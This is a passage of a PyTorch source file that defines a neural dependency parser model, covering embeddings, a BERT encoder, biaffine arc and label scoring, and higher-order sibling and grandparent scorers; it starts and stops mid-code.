tensor\n# (batch, max_sentence_length, max_lemma_length)\n# :param gold_lengths: only used in training; length of each gold lemma.\n# tensor (batch, max_sentence_length)\n# :return:\n# If training: tensor (batch, max_sentence_length, max_token_length,\n# vocab_size) with logits for each character.\n# At inference time: tensor (batch, max_sentence_length,\n# unroll_steps + 1) with character indices and possibly EOS.\n# \"\"\"\n# batch_size, max_sentence_length, max_token_length = chars.shape\n# new_shape = [batch_size * max_sentence_length, max_token_length]\n# chars = chars.reshape(new_shape)\n# token_lengths1d = token_lengths.reshape(-1)\n#\n# # run only on non-padding tokens\n# real_tokens = token_lengths1d > 0\n# num_real_tokens = real_tokens.sum().item()\n# token_lengths1d = token_lengths1d[real_tokens]\n#\n# # project contexts into (num_real_tokens, 1, num_units)\n# projected_context = self.context_transform(self.dropout(context))\n# projected_context = projected_context.view(\n# batch_size * max_sentence_length, 1, -1)\n# projected_context = projected_context[real_tokens]\n#\n# # (num_real_tokens, max_token_length, num_units)\n# chars = chars[real_tokens]\n#\n# embedded_chars = self.embeddings(chars)\n#\n# # create a binary mask\n# counts = torch.arange(max_token_length).view(1, 1, -1).to(chars.device)\n# stacked_counts = counts.repeat(num_real_tokens, 1, 1)\n# lengths3d = token_lengths1d.view(-1, 1, 1)\n# mask = stacked_counts < lengths3d\n#\n# encoder_input = torch.cat([projected_context, embedded_chars], 1)\n# encoder_output, encoder_state, _ = self.encoder(\n# encoder_input, token_lengths1d, mask)\n#\n# if gold_chars is None:\n# # allow for short words with longer lemmas\n# unroll_steps = max(5, int(1.5 * max_token_length))\n# predictions, _ = greedy(\n# mask, self.embeddings, self.bos_idx, self.eos_idx, unroll_steps,\n# self.decoder, encoder_output, encoder_state)\n#\n# # predictions is a numpy array\n# output = predictions.reshape([num_real_tokens, -1])\n#\n# real_tokens_np = real_tokens.cpu().numpy()\n# shape = [batch_size * max_sentence_length, unroll_steps]\n# padded_output = np.zeros(shape, np.int)\n# padded_output[real_tokens_np] = output\n# padded_output = padded_output.reshape(\n# [batch_size, max_sentence_length, unroll_steps])\n# else:\n# gold_chars2d = gold_chars.reshape(\n# batch_size * max_sentence_length, -1)\n# gold_chars2d = gold_chars2d[real_tokens]\n# gold_lengths1d = gold_lengths.view(-1)[real_tokens]\n# gold_chars2d_eos = self.append_eos(gold_chars2d, gold_lengths1d)\n# self.cached_gold_chars = gold_chars2d_eos\n# self.cached_real_token_inds = real_tokens\n# gold_chars2d = self.prepend_bos(gold_chars2d)\n# embedded_target = self.embeddings(gold_chars2d)\n#\n# # unroll for the number of gold steps.\n# unroll_steps = gold_chars2d.shape[-1]\n#\n# # the decoder returns outputs, states, att distribution and values\n# outputs = self.decoder(\n# embedded_target, encoder_output, encoder_state,\n# mask, unroll_steps)[0]\n#\n# # outputs is a tuple (logits, state, att_distribution, att_sum)\n# logits = outputs[0]\n#\n# # (batch, max_sentence_length, max_predicted_length, vocab_size)\n# padded_output = torch.zeros(\n# batch_size * max_sentence_length, unroll_steps,\n# logits.shape[-1], device=chars.device)\n# padded_output[real_tokens] = logits\n# padded_output = padded_output.reshape(\n# [batch_size, max_sentence_length, unroll_steps, -1])\n#\n# return padded_output\n\n\nclass DependencyNeuralModel(nn.Module):\n def __init__(self,\n model_type,\n token_dictionary,\n 
fixed_word_embeddings,\n trainable_word_embedding_size=75,\n lemma_embedding_size=0,\n char_embedding_size=250,\n char_hidden_size=400,\n transform_size=125,\n rnn_size=400,\n shared_rnn_layers=2,\n tag_embedding_size=0,\n arc_mlp_size=400,\n label_mlp_size=400,\n ho_mlp_size=200,\n dropout=0.5,\n word_dropout=0.33,\n predict_upos=True,\n predict_xpos=True,\n predict_morph=True,\n predict_lemma=False,\n predict_tree=True,\n tag_mlp_size=0,\n pretrained_name_or_config=None):\n \"\"\"\n :param model_type: a ModelType object\n :param token_dictionary: TokenDictionary object\n :type token_dictionary: TokenDictionary\n :param fixed_word_embeddings: numpy or torch embedding matrix\n (kept fixed), or None\n :param word_dropout: probability of replacing a word with the unknown\n token\n :param pretrained_name_or_config: None, a string (with the pretrained\n BERT model to be used) or a BertConfig instance when loading a pre\n trained parser. If None, no BERT will be used.\n \"\"\"\n super(DependencyNeuralModel, self).__init__()\n self.char_embedding_size = char_embedding_size\n self.char_hidden_size = char_hidden_size\n self.tag_embedding_size = tag_embedding_size\n self.transform_size = transform_size\n self.arc_mlp_size = arc_mlp_size\n self.tag_mlp_size = tag_mlp_size\n self.ho_mlp_size = ho_mlp_size\n self.label_mlp_size = label_mlp_size\n self.dropout_rate = dropout\n self.word_dropout_rate = word_dropout\n self.on_gpu = torch.cuda.is_available()\n self.predict_upos = predict_upos\n self.predict_xpos = predict_xpos\n self.predict_morph = predict_morph\n self.predict_lemma = predict_lemma\n self.predict_tree = predict_tree\n self.predict_tags = predict_upos or predict_xpos or \\\n predict_morph or predict_lemma\n self.model_type = model_type\n self.rnn_size = rnn_size\n\n self.unknown_fixed_word = token_dictionary.get_embedding_id(UNKNOWN)\n self.unknown_trainable_word = token_dictionary.get_form_id(UNKNOWN)\n self.unknown_upos = token_dictionary.get_upos_id(UNKNOWN)\n self.unknown_xpos = token_dictionary.get_xpos_id(UNKNOWN)\n self.unknown_lemma = token_dictionary.get_lemma_id(UNKNOWN)\n morph_alphabets = token_dictionary.morph_tag_alphabets\n self.unknown_morphs = [0] * len(morph_alphabets)\n for i, feature_name in enumerate(morph_alphabets):\n alphabet = morph_alphabets[feature_name]\n self.unknown_morphs[i] = alphabet.lookup(UNKNOWN)\n\n total_encoded_dim = 0\n\n if trainable_word_embedding_size:\n num_words = token_dictionary.get_num_forms()\n self.trainable_word_embeddings = nn.Embedding(\n num_words, trainable_word_embedding_size)\n total_encoded_dim += trainable_word_embedding_size\n else:\n self.trainable_word_embeddings = None\n\n if lemma_embedding_size:\n num_lemmas = token_dictionary.get_num_lemmas()\n self.lemma_embeddings = nn.Embedding(\n num_lemmas, lemma_embedding_size)\n total_encoded_dim += lemma_embedding_size\n else:\n self.lemma_embeddings = None\n\n if tag_embedding_size:\n # only use tag embeddings if there are actual tags, not only special\n # symbols for root, unknown, etc\n num_upos = token_dictionary.get_num_upos_tags()\n if num_upos > len(SPECIAL_SYMBOLS):\n self.upos_embeddings = nn.Embedding(num_upos,\n tag_embedding_size)\n else:\n self.upos_embeddings = None\n\n # also check if UPOS and XPOS are not the same\n num_xpos = token_dictionary.get_num_xpos_tags()\n xpos_tags = token_dictionary.get_xpos_tags()\n upos_tags = token_dictionary.get_upos_tags()\n if num_xpos > len(SPECIAL_SYMBOLS) and \\\n upos_tags != xpos_tags:\n self.xpos_embeddings = 
nn.Embedding(num_xpos,\n tag_embedding_size)\n else:\n self.xpos_embeddings = None\n\n if self.upos_embeddings is not None or \\\n self.xpos_embeddings is not None:\n # both types of POS embeddings are summed\n total_encoded_dim += tag_embedding_size\n self.morph_embeddings = nn.ModuleList()\n for feature_name in morph_alphabets:\n alphabet = morph_alphabets[feature_name]\n embeddings = nn.Embedding(len(alphabet), tag_embedding_size)\n self.morph_embeddings.append(embeddings)\n total_encoded_dim += tag_embedding_size\n else:\n self.upos_embeddings = None\n self.xpos_embeddings = None\n self.morph_embeddings = None\n\n num_chars = token_dictionary.get_num_characters()\n if self.char_embedding_size:\n self.char_rnn = CharLSTM(\n num_chars, char_embedding_size, char_hidden_size,\n dropout=dropout, bidirectional=False)\n\n if self.transform_size > 0:\n self.char_projection = nn.Linear(\n char_hidden_size, transform_size, bias=False)\n total_encoded_dim += transform_size\n else:\n total_encoded_dim += char_hidden_size\n else:\n self.char_rnn = None\n\n if fixed_word_embeddings is None:\n self.fixed_word_embeddings = None\n else:\n fixed_word_embeddings = torch.tensor(fixed_word_embeddings,\n dtype=torch.float)\n self.fixed_word_embeddings = nn.Embedding.from_pretrained(\n fixed_word_embeddings, freeze=True)\n if self.transform_size > 0:\n self.fixed_embedding_projection = nn.Linear(\n fixed_word_embeddings.shape[1], transform_size, bias=False)\n total_encoded_dim += transform_size\n else:\n total_encoded_dim += fixed_word_embeddings.shape[1]\n\n if pretrained_name_or_config is None:\n self.encoder = None\n elif isinstance(pretrained_name_or_config, BertConfig):\n self.encoder = BertModel(pretrained_name_or_config)\n total_encoded_dim += encoder_dim\n else:\n self.encoder = BertModel.from_pretrained(\n pretrained_name_or_config, output_hidden_states=True)\n total_encoded_dim += encoder_dim\n\n self.dropout_replacement = nn.Parameter(\n torch.randn(total_encoded_dim) / np.sqrt(total_encoded_dim))\n self.dropout = nn.Dropout(dropout)\n self.total_encoded_dim = total_encoded_dim\n\n if shared_rnn_layers > 0 and rnn_size > 0:\n self.shared_rnn = HighwayLSTM(\n total_encoded_dim, rnn_size, shared_rnn_layers,\n self.dropout_rate)\n hidden_dim = 2 * self.rnn_size\n else:\n self.shared_rnn = None\n hidden_dim = total_encoded_dim\n\n # POS and morphology tags\n if self.predict_tags:\n if self.rnn_size > 0:\n self.tagger_rnn = LSTM(\n hidden_dim, self.rnn_size, bidirectional=True)\n tagger_dim = 2 * self.rnn_size\n else:\n self.tagger_rnn = None\n tagger_dim = total_encoded_dim\n\n scorer_dim = tag_mlp_size if tag_mlp_size > 0 else tagger_dim\n\n if predict_upos:\n if tag_mlp_size > 0:\n self.upos_mlp = self._create_mlp(\n tagger_dim, tag_mlp_size, num_layers=1,\n output_activation=nn.ReLU())\n num_tags = token_dictionary.get_num_upos_tags()\n self.upos_scorer = self._create_scorer(scorer_dim, num_tags,\n bias=True)\n if predict_xpos:\n if tag_mlp_size > 0:\n self.xpos_mlp = self._create_mlp(\n tagger_dim, tag_mlp_size, num_layers=1,\n output_activation=nn.ReLU())\n num_tags = token_dictionary.get_num_xpos_tags()\n self.xpos_scorer = self._create_scorer(scorer_dim, num_tags,\n bias=True)\n if predict_morph:\n if tag_mlp_size > 0:\n self.morph_mlp = self._create_mlp(\n tagger_dim, tag_mlp_size, num_layers=1,\n output_activation=nn.ReLU())\n num_tags = token_dictionary.get_num_morph_singletons()\n self.morph_scorer = self._create_scorer(scorer_dim, num_tags,\n bias=True)\n # if predict_lemma:\n # 
self.lemmatizer = Lemmatizer(\n # num_chars, char_embedding_size, char_hidden_size, dropout,\n # tagger_dim, token_dictionary)\n\n if self.predict_tree:\n if self.rnn_size > 0:\n self.parser_rnn = LSTM(\n hidden_dim, self.rnn_size, bidirectional=True)\n parser_dim = 2 * self.rnn_size\n else:\n self.parser_rnn = None\n parser_dim = hidden_dim\n\n # first order layers\n num_labels = token_dictionary.get_num_deprels()\n self.arc_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, arc_mlp_size, 1, dropout=dropout)\n self.label_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, label_mlp_size,\n num_labels, dropout=dropout)\n self.linearization_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, arc_mlp_size, 1, dropout=dropout)\n self.distance_scorer = DeepBiaffineScorer(\n parser_dim, parser_dim, arc_mlp_size, 1, dropout=dropout)\n\n # Higher order layers\n if model_type.grandparents:\n self.gp_grandparent_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gp_head_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gp_modifier_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gp_coeff = self._create_parameter_tensor([3], 1.)\n self.grandparent_scorer = self._create_scorer(self.ho_mlp_size)\n\n if model_type.consecutive_siblings:\n self.sib_head_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.sib_modifier_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.sib_sibling_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.sib_coeff = self._create_parameter_tensor([3], 1.)\n self.sibling_scorer = self._create_scorer(self.ho_mlp_size)\n\n if model_type.consecutive_siblings or model_type.grandsiblings \\\n or model_type.trisiblings or model_type.arbitrary_siblings:\n self.null_sibling_tensor = self._create_parameter_tensor(\n parser_dim)\n\n if model_type.grandsiblings:\n self.gsib_head_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_modifier_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_sibling_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_grandparent_mlp = self._create_mlp(\n parser_dim, self.ho_mlp_size)\n self.gsib_coeff = self._create_parameter_tensor([3], 1.)\n self.grandsibling_scorer = self._create_scorer(self.ho_mlp_size)\n\n # Clear out the gradients before the next batch.\n self.zero_grad()\n\n def extra_repr(self) -> str:\n dim = self.dropout_replacement.shape[0]\n return '(dropout_replacement): Tensor(%d)' % dim\n\n def _create_parameter_tensor(self, shape, value=None):\n \"\"\"\n Create a tensor for representing some special token. It is included in\n the model parameters.\n \"\"\"\n if value is None:\n tensor = torch.randn(shape) / np.sqrt(shape)\n else:\n tensor = torch.full(shape, value)\n if self.on_gpu:\n tensor = tensor.cuda()\n \n parameter = nn.Parameter(tensor)\n\n return parameter\n\n def _create_scorer(self, input_size=None, output_size=1, bias=False):\n \"\"\"\n Create the weights for scoring a given tensor representation to a\n single number.\n\n :param input_size: expected input size. 
If None, arc_mlp_size\n is used.\n :return: an nn.Linear object\n \"\"\"\n if input_size is None:\n input_size = self.arc_mlp_size\n linear = nn.Linear(input_size, output_size, bias=bias)\n scorer = nn.Sequential(self.dropout, linear)\n\n return scorer\n\n def _create_mlp(self, input_size=None, hidden_size=None, num_layers=1,\n output_activation=None):\n \"\"\"\n Create the weights for a fully connected subnetwork.\n\n The output has a linear activation; if num_layers > 1, hidden layers\n will use a non-linearity. If output_activation is given, it will be\n applied to the output.\n\n The first layer will have a weight matrix (input x hidden), subsequent\n layers will be (hidden x hidden).\n\n :param input_size: if not given, will be assumed rnn_size * 2\n :param hidden_size: if not given, will be assumed arc_mlp_size\n :param num_layers: number of hidden layers (including the last one). If\n not given, will be mlp_layers\n :return: an nn.Linear object, mapping an input with 2*hidden_units\n to hidden_units.\n \"\"\"\n if input_size is None:\n input_size = self.total_encoded_dim\n if hidden_size is None:\n hidden_size = self.arc_mlp_size\n\n layers = []\n for i in range(num_layers):\n if i > 0:\n layers.append(torch.relu)\n\n linear = nn.Linear(input_size, hidden_size)\n layers.extend([self.dropout, linear])\n input_size = hidden_size\n\n if output_activation is not None:\n layers.append(output_activation)\n\n mlp = nn.Sequential(*layers)\n return mlp\n\n def save(self, file):\n torch.save(self.state_dict(), file)\n\n def create_metadata(self) -> dict:\n \"\"\"\n Return a dictionary with metadata needed to reconstruct a serialized\n model.\n \"\"\"\n if self.fixed_word_embeddings is None:\n vocab, dim = 0, 0\n else:\n vocab, dim = self.fixed_word_embeddings.weight.shape\n if self.encoder is None:\n data = {}\n else:\n bert_config = self.encoder.config\n data = bert_config.to_dict()\n\n data['fixed_embedding_vocabulary'] = vocab\n data['fixed_embedding_size'] = dim\n\n return data\n\n @classmethod\n def load(cls, torch_file, options, token_dictionary, metadata):\n fixed_embedding_vocab_size = metadata['fixed_embedding_vocabulary']\n fixed_embedding_size = metadata['fixed_embedding_size']\n lemma_embedding_size = options.lemma_embedding_size\n char_embedding_size = options.char_embedding_size\n trainable_embedding_size = options.embedding_size\n tag_embedding_size = options.tag_embedding_size\n char_hidden_size = options.char_hidden_size\n transform_size = options.transform_size\n rnn_size = options.rnn_size\n shared_layers = options.rnn_layers\n arc_mlp_size = options.arc_mlp_size\n tag_mlp_size = options.tag_mlp_size\n label_mlp_size = options.label_mlp_size\n ho_mlp_size = options.ho_mlp_size\n dropout = options.dropout\n word_dropout = options.word_dropout\n predict_upos = options.upos\n predict_xpos = options.xpos\n predict_morph = options.morph\n predict_lemma = options.lemma\n predict_tree = options.parse\n model_type = options.model_type\n\n if fixed_embedding_vocab_size > 0:\n dummy_embeddings = np.empty([fixed_embedding_vocab_size,\n fixed_embedding_size], np.float32)\n else:\n dummy_embeddings = None\n\n if options.bert_model is None:\n config = None\n else:\n config = BertConfig.from_dict(metadata)\n\n model = DependencyNeuralModel(\n model_type, token_dictionary, dummy_embeddings,\n trainable_embedding_size,\n lemma_embedding_size,\n char_embedding_size,\n tag_embedding_size=tag_embedding_size,\n char_hidden_size=char_hidden_size,\n transform_size=transform_size,\n 
rnn_size=rnn_size,\n shared_rnn_layers=shared_layers,\n arc_mlp_size=arc_mlp_size,\n tag_mlp_size=tag_mlp_size,\n label_mlp_size=label_mlp_size,\n ho_mlp_size=ho_mlp_size,\n dropout=dropout,\n word_dropout=word_dropout,\n predict_upos=predict_upos, predict_xpos=predict_xpos,\n predict_morph=predict_morph, predict_lemma=predict_lemma,\n predict_tree=predict_tree, pretrained_name_or_config=config)\n\n if model.on_gpu:\n state_dict = torch.load(torch_file)\n else:\n state_dict = torch.load(torch_file, map_location='cpu')\n\n # kind of a hack to allow compatibility with previous versions\n own_state_dict = model.state_dict()\n pretrained_dict = {k: v for k, v in state_dict.items() if\n k in own_state_dict}\n own_state_dict.update(pretrained_dict)\n model.load_state_dict(own_state_dict)\n\n return model\n\n def _compute_arc_scores(self, states, lengths, normalization):\n \"\"\"\n Compute the first order scores and store them in the appropriate\n position in the `scores` tensor.\n\n The score matrices have shape (modifer, head), and do not have the row\n corresponding to the root as a modifier. Thus they have shape\n (num_words - 1, num_words).\n\n :param states: hidden states returned by the RNN; one for each word\n :param lengths: length of each sentence in the batch (including root)\n :param normalization: 'global' or 'local'\n \"\"\"\n batch_size, max_sent_size, _ = states.size()\n\n # apply dropout separately to get different masks\n # head_scores is interpreted as (batch, modifier, head)\n head_scores = self.arc_scorer(self.dropout(states),\n self.dropout(states)).squeeze(3)\n s1 = self.dropout(states)\n s2 = self.dropout(states)\n label_scores = self.label_scorer(s1, s2)\n\n if normalization == ParsingObjective.LOCAL:\n # set arc scores from each word to itself as -inf\n # structured models don't need it as these arcs are never predicted\n diag = torch.eye(max_sent_size, device=states.device).bool()\n diag = diag.unsqueeze(0)\n head_scores.masked_fill_(diag, -np.inf)\n\n # set padding head scores to -inf\n # during training, label loss is computed with respect to the gold\n # arcs, so there's no need to set -inf scores to invalid positions\n # in label scores.\n padding_mask = create_padding_mask(lengths)\n head_scores = head_scores.masked_fill(padding_mask.unsqueeze(1),\n -np.inf)\n\n if self.training and normalization == ParsingObjective.GLOBAL_MARGIN:\n dev = head_scores.device\n head_scores += gumbel.sample(head_scores.shape).to(dev)\n label_scores += gumbel.sample(label_scores.shape).to(dev)\n\n # linearization (scoring heads after/before modifier)\n arange = torch.arange(max_sent_size, device=states.device)\n position1 = arange.view(1, 1, -1).expand(batch_size, -1, -1)\n position2 = arange.view(1, -1, 1).expand(batch_size, -1, -1)\n head_offset = position1 - position2\n sign_scores = self.linearization_scorer(self.dropout(states),\n self.dropout(states)).squeeze(3)\n sign_sigmoid = F.logsigmoid(\n sign_scores * torch.sign(head_offset).float()).detach()\n head_scores += sign_sigmoid\n\n # score distances between head and modifier\n dist_scores = self.distance_scorer(self.dropout(states),\n self.dropout(states)).squeeze(3)\n dist_pred = 1 + F.softplus(dist_scores)\n dist_target = torch.abs(head_offset)\n\n # KL divergence between predicted distances and actual ones\n dist_kld = -torch.log((dist_target.float() - dist_pred) ** 2 / 2 + 1)\n head_scores += dist_kld.detach()\n\n # exclude attachment for the root symbol\n head_scores = head_scores[:, 1:]\n label_scores = label_scores[:, 
1:]\n sign_scores = sign_scores[:, 1:]\n dist_kld = dist_kld[:, 1:]\n\n self.scores[Target.HEADS] = head_scores\n self.scores[Target.RELATIONS] = label_scores\n self.scores[Target.SIGN] = sign_scores\n self.scores[Target.DISTANCE] = dist_kld\n\n def _compute_grandparent_scores(self, states, parts):\n \"\"\"`\n Compute the grandparent scores and store them in the\n appropriate position in the `scores` tensor.\n\n :param states: hidden states returned by the RNN; one for each word\n :param parts: a DependencyParts object containing the parts to be scored\n :type parts: DependencyParts\n \"\"\"\n # there may be no grandparent parts in some cases\n if parts.get_num_type(Target.GRANDPARENTS) == 0:\n empty = torch.tensor([], device=states.device)\n self.scores[Target.GRANDPARENTS].append(empty)\n return\n\n head_tensors = self.gp_head_mlp(states)\n grandparent_tensors = self.gp_grandparent_mlp(states)\n modifier_tensors = self.gp_modifier_mlp(states)\n\n head_indices = []\n modifier_indices = []\n grandparent_indices = []\n\n for part in parts.part_lists[Target.GRANDPARENTS]:\n # list all indices, then feed the corresponding tensors to the net\n head_indices.append(part.head)\n modifier_indices.append(part.modifier)\n grandparent_indices.append(part.grandparent)\n\n heads = head_tensors[head_indices]\n modifiers = modifier_tensors[modifier_indices]\n grandparents = grandparent_tensors[grandparent_indices]\n\n # we don't have H+M because those are already encoded in the arcs\n c = self.gp_coeff\n states_mg = c[0] * torch.tanh(modifiers + grandparents)\n states_hg = c[1] * torch.tanh(heads + grandparents)\n states_hmg = c[2] * torch.tanh(heads + modifiers + grandparents)\n final_states = states_mg + states_hg + states_hmg\n part_scores = self.grandparent_scorer(final_states)\n\n self.scores[Target.GRANDPARENTS].append(part_scores.view(-1))\n\n def _compute_consecutive_sibling_scores(self, states, parts):\n \"\"\"\n Compute the consecutive sibling scores and store them in the\n appropriate position in the `scores` tensor.\n\n :param states: hidden states returned by the RNN; one for each word\n :param parts: a DependencyParts object containing the parts to be scored\n :type parts: DependencyParts\n \"\"\"\n # include the vector for null sibling\n # word_sibling_tensors is (num_words=1, hidden_units)\n states_and_sibling = torch.cat([states,\n self.null_sibling_tensor.view(1, -1)])\n\n head_tensors = self.sib_head_mlp(states)\n modifier_tensors = self.sib_modifier_mlp(states)\n sibling_tensors = self.sib_sibling_mlp(states_and_sibling)\n\n head_indices = []\n modifier_indices = []\n sibling_indices = []\n\n for part in parts.part_lists[Target.NEXT_SIBLINGS]:\n # list all indices to the candidate head/modifier/siblings, then\n # process them all at once for faster execution.\n head_indices.append(part.head)\n modifier_indices.append(part.modifier)\n if part.sibling == 0:\n # sibling == 0 or -1 indicates there's no sibling to the left\n # (to the right, sibling == len(states))\n sibling_indices.append(len(states))\n else:\n sibling_indices.append(part.sibling)\n\n heads = head_tensors[head_indices]\n modifiers = modifier_tensors[modifier_indices]\n siblings = sibling_tensors[sibling_indices]\n\n # we don't have H+M because those are already encoded in the arcs\n c = self.sib_coeff\n states_hs = c[0] * torch.tanh(heads + siblings)\n states_ms = c[1] * torch.tanh(modifiers + siblings)\n states_hms = c[2] * torch.tanh(heads + modifiers + siblings)\n final_states = states_hs + states_ms + states_hms\n\n 
sibling_scores = self.sibling_scorer(final_states)\n\n self.scores[Target.NEXT_SIBLINGS].append(sibling_scores.view(-1))\n\n def _compute_grandsibling_scores(self, states, parts):\n \"\"\"\n Compute the consecutive grandsibling scores and store them in the\n appropriate position in the `scores` tensor.\n\n :param states: hidden states returned by the RNN; one for each word\n :param parts: a DependencyParts object containing the parts to be scored\n :type parts: DependencyParts\n \"\"\"\n # include the vector for null sibling\n # word_sibling_tensors is (num_words=1, hidden_units)\n states_and_sibling = torch.cat([states,\n self.null_sibling_tensor.view(1, -1)])\n\n head_tensors = self.gsib_head_mlp(states)\n modifier_tensors = self.gsib_modifier_mlp(states)\n sibling_tensors = self.gsib_sibling_mlp(states_and_sibling)\n grandparent_tensors = self.gsib_grandparent_mlp(states)\n\n head_indices = []\n modifier_indices = []\n sibling_indices = []\n grandparent_indices = []\n\n for part in parts.part_lists[Target.GRANDSIBLINGS]:\n # list all indices to the candidate head/mod/sib/grandparent\n head_indices.append(part.head)\n modifier_indices.append(part.modifier)\n grandparent_indices.append(part.grandparent)\n if part.sibling == 0:\n # sibling == 0 or -1 indicates there's no sibling to the left\n # (to the right, sibling == len(states))\n sibling_indices.append(len(states))\n else:\n sibling_indices.append(part.sibling)\n\n heads = head_tensors[head_indices]\n modifiers = modifier_tensors[modifier_indices]\n siblings = sibling_tensors[sibling_indices]\n grandparents = grandparent_tensors[grandparent_indices]\n\n c = self.gsib_coeff\n states_hsg = c[0] * torch.tanh(heads + siblings + grandparents)\n states_msg = c[1] * torch.tanh(modifiers + siblings + grandparents)\n states_hmsg = c[2] * torch.tanh(\n heads + modifiers + siblings + grandparents)\n gsib_states = states_hsg + states_msg + states_hmsg\n gsib_scores = self.grandsibling_scorer(gsib_states)\n\n self.scores[Target.GRANDSIBLINGS].append(gsib_scores.view(-1))\n\n def _get_bert_representations(self, instances, max_num_tokens):\n \"\"\"\n Get BERT encoded representations for the instances\n\n :return: a tensor (batch, max_num_tokens, encoder_dim)\n \"\"\"\n batch_size = len(instances)\n # word piece lengths\n wp_lengths = torch.tensor([len(inst.bert_ids) for inst in instances],\n dtype=torch.long)\n if self.on_gpu:\n wp_lengths = wp_lengths.cuda()\n max_length = wp_lengths.max()\n indices = torch.zeros([batch_size, max_length], dtype=torch.long,\n device=wp_lengths.device)\n\n # this contains the indices of the first word piece of real tokens.\n # positions past the sequence size will have 0's and will be ignored\n # afterwards anyway (treated as padding)\n real_indices = torch.zeros([batch_size, max_num_tokens],\n dtype=torch.long, device=wp_lengths.device)\n for i, inst in enumerate(instances):\n inst_length = wp_lengths[i]\n indices[i, :inst_length] = torch.tensor(\n inst.bert_ids, device=indices.device)\n\n # instance length is not the same as wordpiece length!\n # start from 1, because 0 will point to CLS as the root symbol\n real_indices[i, 1:len(inst)] = torch.tensor(\n inst.bert_token_starts, device=indices.device) + 1\n\n ones = torch.ones_like(indices)\n mask = ones.cumsum(1) <= wp_lengths.unsqueeze(1)\n\n if max_length > max_encoder_length:\n # if there are more tokens than the encoder can handle, break them\n # in smaller sequences.\n quarter_max = max_encoder_length // 4\n partial_encoded = []\n\n # possibly not all samples 
in the batch have the same length, but\n # even more likely one single huge sentence has the batch for itself\n ind_splits = torch.split(indices, quarter_max, 1)\n mask_splits = torch.split(mask, quarter_max, 1)\n\n for i in range(0, len(ind_splits) - 2, 2):\n # run the inputs through the encoder with at least a quarter of\n # context before and after\n partial_inds = torch.cat(ind_splits[i:i + 4], 1)\n partial_mask = torch.cat(mask_splits[i:i + 4], 1)\n\n # partial_hidden is a tuple of embeddings and hidden layers\n _, _, partial_hidden = self.encoder(partial_inds, partial_mask)\n\n last_states = torch.stack(partial_hidden[-4:])\n if i == 0:\n # include the first quarter\n last_states = last_states[:, :, :3 * quarter_max]\n elif i + 4 >= len(ind_splits):\n # include the last quarter\n last_states = last_states[:, :, quarter_max:]\n else:\n # only take the middle two quarters\n last_states = last_states[:, :, quarter_max:-quarter_max]\n\n partial_encoded.append(last_states.mean(0))\n\n encoded = torch.cat(partial_encoded, 1)\n else:\n # hidden is a tuple of embeddings and hidden layers\n _, _, hidden = self.encoder(indices, mask)\n\n # TODO: use a better aggregation scheme\n last_states = torch.stack(hidden[-4:])\n encoded = last_states.mean(0)\n\n # get the first wordpiece for tokens that were split, and CLS for root\n r = torch.arange(batch_size, device=encoded.device).unsqueeze(1)\n encoded = encoded[r, real_indices]\n\n return encoded\n\n def get_word_representations(self, instances, max_length, char_indices,\n token_lengths):\n \"\"\"\n Get the full embedding representations of words in the batch, including\n word type embeddings, char level and POS tag embeddings.\n\n :param instances: list of instance objects\n :param max_length: length of the longest instance in the batch\n :return: a tensor with shape (batch, max_num_tokens, embedding_size)\n \"\"\"\n all_embeddings = []\n\n if self.trainable_word_embeddings is not None:\n trainable_embeddings = self._get_embeddings(instances, max_length,\n 'trainableword')\n all_embeddings.append(trainable_embeddings)\n\n if self.encoder is not None:\n bert_embeddings = self._get_bert_representations(instances,\n max_length)\n all_embeddings.append(bert_embeddings)\n\n if self.fixed_word_embeddings is not None:\n word_embeddings = self._get_embeddings(\n instances, max_length, 'fixedword')\n if self.transform_size > 0:\n word_embeddings = self.fixed_embedding_projection(\n word_embeddings)\n all_embeddings.append(word_embeddings)\n\n if self.lemma_embeddings is not None:\n lemma_embeddings = self._get_embeddings(instances, max_length,\n 'lemma')\n all_embeddings.append(lemma_embeddings)\n\n upos = 0 if self.upos_embeddings is None \\\n else self._get_embeddings(instances, max_length, 'upos')\n xpos = 0 if self.xpos_embeddings is None \\\n else self._get_embeddings(instances, max_length, 'xpos')\n pos_embeddings = upos + xpos\n if pos_embeddings is not 0:\n all_embeddings.append(pos_embeddings)\n\n if self.morph_embeddings is not None:\n morph_embeddings = self._get_embeddings(instances, max_length,\n 'morph')\n all_embeddings.append(morph_embeddings)\n\n if self.char_rnn is not None:\n char_embeddings = self.char_rnn(char_indices, token_lengths)\n if self.transform_size > 0:\n dropped = self.dropout(char_embeddings)\n char_embeddings = self.char_projection(dropped)\n all_embeddings.append(char_embeddings)\n\n # each embedding tensor is (batch, num_tokens, embedding_size)\n embeddings = torch.cat(all_embeddings, dim=2)\n\n if 
self.word_dropout_rate:\n if self.training:\n # apply word dropout -- replace by a random tensor\n dropout_draw = torch.rand_like(embeddings[:, :, 0])\n inds = dropout_draw < self.word_dropout_rate\n embeddings[inds] = self.dropout_replacement\n else:\n # weight embeddings by the training dropout rate\n embeddings *= (1 - self.word_dropout_rate)\n embeddings += self.word_dropout_rate * self.dropout_replacement\n\n return embeddings\n\n def _get_embeddings(self, instances, max_length, type_):\n \"\"\"\n Get the word or tag embeddings for all tokens in the instances.\n\n This function takes care of padding.\n\n :param type_: 'fixedword', 'trainableword', 'upos' or 'xpos'\n :param max_length: length of the longest instance\n :return: a tensor with shape (batch, sequence, embedding size)\n \"\"\"\n if type_ == 'morph':\n # morph features have multiple embeddings (one for each feature)\n num_features = len(self.morph_embeddings)\n shape = (len(instances), max_length, num_features)\n index_tensor = torch.zeros(\n shape, dtype=torch.long,\n device=self.morph_embeddings[0].weight.device)\n\n for i, instance in enumerate(instances):\n indices = instance.get_all_morph_tags()\n index_tensor[i, :len(instance)] = torch.tensor(indices)\n\n embedding_sum = 0\n for i, matrix in enumerate(self.morph_embeddings):\n indices = index_tensor[:, :, i]\n\n # embeddings is (batch, max_length, num_units)\n embeddings = 